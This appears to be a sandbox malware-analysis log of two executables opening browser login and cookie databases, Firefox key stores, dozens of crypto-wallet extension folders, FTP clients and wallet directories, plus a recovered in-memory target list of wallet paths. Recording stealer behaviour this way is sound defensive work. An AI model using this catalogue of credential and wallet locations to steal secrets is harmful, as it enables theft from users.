Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
